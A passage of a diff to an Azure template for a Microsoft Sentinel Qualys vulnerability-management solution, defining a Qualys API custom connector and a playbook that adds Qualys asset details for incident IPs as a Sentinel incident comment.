"\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/scan/": { + "post": { + "summary": "VM Scan Operations", + "description": "List, Launch and Fetch Scan", + "operationId": "[[variables('_operationId-VMScanOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "x-ms-visibility": "important", + "enum": [ + "list", + "launch", + "fetch" + ], + "description": "Choose Action According to Operation" + }, + { + "name": "ip", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "IP Addresses", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_ref", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for List and Fetch Action", + "x-ms-summary": "Scan Ref", + "x-ms-visibility": "advanced" + }, + { + "name": "launched_after_datetime", + "in": "query", + "type": "string", + "required": false, + "description": "Get the Scans Launched After DateTime", + "x-ms-summary": "Launched After DateTime", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_title", + "in": "query", + "type": "string", + "required": false, + "x-ms-visibility": "advanced", + "description": "Mandatory For Lauch Action", + "x-ms-summary": "Scan Title" + }, + { + "name": "option_id", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "Option Profile ID", + "x-ms-visibility": "advanced" + }, + { + "name": "iscanner_name", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Launch Action", + "x-ms-summary": "Scanner Name", + "x-ms-visibility": "advanced" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/subscription/option_profile/vm/": { + "post": { + "summary": "Option Profile Operations", + "description": "List, Create and Delete Option Profile", + "operationId": "[[variables('_operationId-OptionProfileOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "description": "Choose Action According to Operation", + "x-ms-summary": "Action", + "enum": [ + "list", + "create", + "delete" + ], + "x-ms-visibility": "important" + }, + { + "name": "id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for List and Delete Actions", + "x-ms-summary": "Option Profile ID" + }, + { + "name": "title", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Profile Title", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_tcp_ports", + "in": "query", + "type": "string", + "required": false, + "enum": [ + "none", + "full", + "standard", + "light" + ], + "description": "Mandatory for Create Action", + "x-ms-visibility": "advanced", + "x-ms-summary": "Scan TCP Ports" + }, + { + "name": "scan_tcp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Additional Ports for Scanning", + "x-ms-visibility": "advanced", + "x-ms-summary": "Additional TCP Ports" + }, + { + "name": "scan_udp_ports", + "in": "query", + "type": "string", + "required": false, + "enum": [ + "none", + "full", + "standard", + "light" + ], + "description": "Mandatory for Create Action", + "x-ms-summary": "Scan UDP Ports", + "x-ms-visibility": "advanced" + }, + { + "name": "scan_udp_ports_additional", + "default": "139,445", + "in": "query", + "type": "string", + "required": false, + "description": "Additional Ports for Scanning", + "x-ms-summary": "Additional UDP Ports", + "x-ms-visibility": "advanced" + }, + { + "name": "vulnerability_detection", + "default": "complete", + "in": "query", + "type": "string", + "required": false, + "enum": [ + "complete", + "custom" + ], + "x-ms-visibility": "advanced", + "x-ms-summary": "Vulnerability Detection", + "description": "Mandatory for Create Action" + }, + { + "name": "basic_information_gathering", + "in": "query", + "type": "string", + "required": false, + "x-ms-visibility": "advanced", + "enum": [ + "all", + "register", + "netblockonly", + "none" + ], + "description": "Mandatory for Create Action", + "x-ms-summary": "Information Gathering" + }, + { + "name": "map_tcp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Map TCP Ports", + "x-ms-visibility": "advanced", + "default": 1, + "enum": [ + 0, + 1 + ] + }, + { + "name": "map_udp_ports_additional", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Map UDP Ports", + "x-ms-visibility": "advanced", + "default": 1, + "enum": [ + 0, + 1 + ] + }, + { + "name": "custom_search_list_ids", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory If Vulnerability Detection is Custom", + "x-ms-summary": "Search List ID" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/appliance/": { + "get": { + "summary": "List Scanner Appliances", + "description": "List All the Available Scanners", + "operationId": "[[variables('_operationId-ListScannerAppliances')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-visibility": "internal", + "description": "Appliance API Action", + "x-ms-summary": "Action" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/report/template/scan/": { + "post": { + "summary": "Scan Report Template Operations", + "description": "Create and Delete Scan Report Template", + "operationId": "[[variables('_operationId-ScanReportTemplateOperations')]", + "parameters": [ + { + "name": "action", + "default": "create", + "in": "query", + "type": "string", + "required": true, + "enum": [ + "create", + "delete" + ], + "description": "Scan Report Template Actions", + "x-ms-summary": "Action" + }, + { + "name": "report_format", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory Action for Create Action", + "x-ms-summary": "Report Format", + "x-ms-visibility": "advanced", + "enum": [ + "xml" + ] + }, + { + "name": "template_id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for Delete Action", + "x-ms-summary": "Scan Report Template ID" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-visibility": "internal", + "x-ms-summary": "Content-Type" + }, + { + "name": "body", + "in": "body", + "schema": { + "type": "string", + "x-ms-visibility": "advanced", + "description": "Update IP and Port Details in the XML Schema", + "title": "Scan Report Template Schema", + "format": "binary", + "default": " \t \t\t<INFO key=\"title\"> \t\t\t<![CDATA[SentinelScanReport]]> \t\t</INFO> \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t\t \t\t\t \t\t \t \t \t\t \t\t\t \t\t \t " + }, + "required": false, + "x-ms-visibility": "advanced" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + "type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + }, + "400": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + "type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/qid/search_list/dynamic/": { + "post": { + "summary": "Dynamic Search List Operations", + "description": "List, Create and Delete Dynamic Search Lists", + "operationId": "[[variables('_operationId-DynamicSearchListOperations')]", + "parameters": [ + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "enum": [ + "list", + "create", + "delete" + ], + "description": "Dynamic Search List Actions", + "x-ms-summary": "Action", + "x-ms-visibility": "important" + }, + { + "name": "id", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Delete Action", + "x-ms-visibility": "advanced", + "x-ms-summary": "Search List ID" + }, + { + "name": "show_qids", + "in": "query", + "type": "string", + "required": false, + "enum": [ + 0, + 1 + ], + "description": "Flag to hide/show QIDs", + "x-ms-summary": "Show QID Flag" + }, + { + "name": "cve_ids", + "in": "query", + "type": "string", + "required": false, + "description": "CVE ID List - Mandatory for Create Action", + "x-ms-summary": "CVE IDs", + "x-ms-visibility": "important" + }, + { + "name": "title", + "in": "query", + "type": "string", + "required": false, + "description": "Mandatory for Create Action", + "x-ms-summary": "Search List Title", + "x-ms-visibility": "advanced" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "default": { + "description": "default" + } + }, + "x-ms-visibility": "important" + } + }, + "/qps/rest/2.0/search/am/hostasset": { + "post": { + "summary": "Search Asset By Criteria", + "description": "Get All Assets for Given Criteria", + "operationId": "[[variables('_operationId-SearchAssetByCriteria')]", + "parameters": [ + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-summary": "Content-Type", + "x-ms-visibility": "internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "description": "Accept", + "x-ms-summary": "Accept", + "x-ms-visibility": "internal" + }, + { + "name": "filter-xml", + "in": "body", + "schema": { + "type": "string", + "description": "Filter Criteria XML", + "title": "filter-criteria", + "default": " \t \t\t100 \t >\" operator=\"EQUALS\">Search Value \t\t \t\t \t\t \t\t \t\t ", + "x-ms-visibility": "advanced" + }, + "required": true + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/qps/rest/2.0/count/am/hostasset": { + "post": { + "summary": "Asset Count By Criteria", + "description": "Get Asset Count for Given Criteria", + "operationId": "[[variables('_operationId-AssetCountByCriteria')]", + "parameters": [ + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + }, + { + "name": "Content-Type", + "in": "header", + "required": true, + "type": "string", + "default": "text/xml", + "description": "Content-Type", + "x-ms-summary": "Content-Type", + "x-ms-visibility": "internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "description": "Accept", + "x-ms-summary": "Accept", + "x-ms-visibility": "internal" + }, + { + "name": "filter-xml", + "in": "body", + "schema": { + "type": "string", + "description": "Filter Criteria XML", + "title": "filter-criteria", + "default": " >\" operator=\"EQUALS\">Search Value \t\t \t\t \t\t \t\t \t\t ", + "x-ms-visibility": "advanced" + }, + "required": true + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"evaluation\"": { + "description": "\"evaluation\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + } + }, + "securityDefinitions": { + "basic_auth": { + "type": "basic" + } + }, + "security": [ + { + "basic_auth": "[variables('TemplateEmptyArray')]" + } + ], + "tags": "[variables('TemplateEmptyArray')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[[concat(variables('workspace-name'),'/Microsoft.SecurityInsights/',concat('LogicAppsCustomConnector-', last(split(variables('playbookId1'),'/'))))]", + "properties": { + "parentId": "[[variables('playbookId1')]", + "contentId": "[variables('_playbookContentId1')]", + "kind": "LogicAppsCustomConnector", + "version": "[variables('playbookVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId1')]", + "contentKind": "LogicAppsCustomConnector", + "displayName": "QualysCustomConnector", + "contentProductId": "[variables('_playbookcontentProductId1')]", + "id": "[variables('_playbookcontentProductId1')]", + "version": "[variables('playbookVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName2')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-GetAssetDetails Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion2')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-GetAssetDetails", + "type": "string" + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-3": "[[variables('connection-3')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Compose_Incident_Comment": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentComment')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Compose_Incident_Comment": { + "runAfter": { + "Create_Output_HTML_table": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@body('Create_Output_HTML_table')" + } + }, + "Create_Output_HTML_table": { + "runAfter": { + "For_each_IP_Address_get_asset_details": [ + "Succeeded" + ] + }, + "type": "Table", + "inputs": { + "format": "HTML", + "from": "@variables('OutputArray')" + } + }, + "Entities_-_Get_IPs": { + "type": "ApiConnection", + "inputs": { + "body": "@triggerBody()?['object']?['properties']?['relatedEntities']", + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/entities/ip" + } + }, + "For_each_IP_Address_get_asset_details": { + "foreach": "@body('Entities_-_Get_IPs')?['IPs']", + "actions": { + "Condition": { + "actions": { + "Append_to_Output_Array": { + "runAfter": { + "Compose_Output": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OutputArray", + "value": "@outputs('Compose_Output')" + } + }, + "Compose_Output": { + "type": "Compose", + "inputs": { + "DNS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS']?['#cdata-section']", + "Domain": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['DOMAIN']?['#cdata-section']", + "FQDN": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['FQDN']?['#cdata-section']", + "Hostname": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['DNS_DATA']?['HOSTNAME']?['#cdata-section']", + "IP Address": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['IP']", + "LastScannedDateTime": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VULN_SCAN_DATETIME']", + "NetBIOS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['NETBIOS']?['#cdata-section']", + "OS": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['OS']?['#cdata-section']", + "QualysAssetID": "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['ID']" + } + } + }, + "runAfter": { + "Parse_Asset_Details_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Add_comment_if_no_details_found": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No details found for host: @{items('For_each_IP_Address_get_asset_details')?['Address']} \n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@body('Parse_Asset_Details_JSON')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']", + null + ] + } + } + ] + }, + "type": "If" + }, + "Get_Asset_Details_By_IP": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/asset/host/", + "queries": { + "action": "list", + "details": "All", + "ips": "@items('For_each_IP_Address_get_asset_details')?['Address']" + } + } + }, + "Parse_Asset_Details_JSON": { + "runAfter": { + "Get_Asset_Details_By_IP": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Asset_Details_By_IP')))", + "schema": { + "properties": { + "HOST_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "HOST_LIST": { + "properties": { + "HOST": { + "properties": { + "DNS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "DNS_DATA": { + "properties": { + "DOMAIN": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "FQDN": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "HOSTNAME": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ID": { + "type": "string" + }, + "IP": { + "type": "string" + }, + "LAST_VM_AUTH_SCANNED_DATE": { + "type": "string" + }, + "LAST_VM_AUTH_SCANNED_DURATION": { + "type": "string" + }, + "LAST_VM_SCANNED_DATE": { + "type": "string" + }, + "LAST_VM_SCANNED_DURATION": { + "type": "string" + }, + "LAST_VULN_SCAN_DATETIME": { + "type": "string" + }, + "NETBIOS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "OS": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TRACKING_METHOD": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_OutputArray": [ + "Succeeded" + ] + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Entities_-_Get_IPs": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentComment", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_OutputArray": { + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OutputArray", + "type": "array" + } + ] + } + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "identity": { + "type": "SystemAssigned" + }, + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssetDetails", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-3')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": 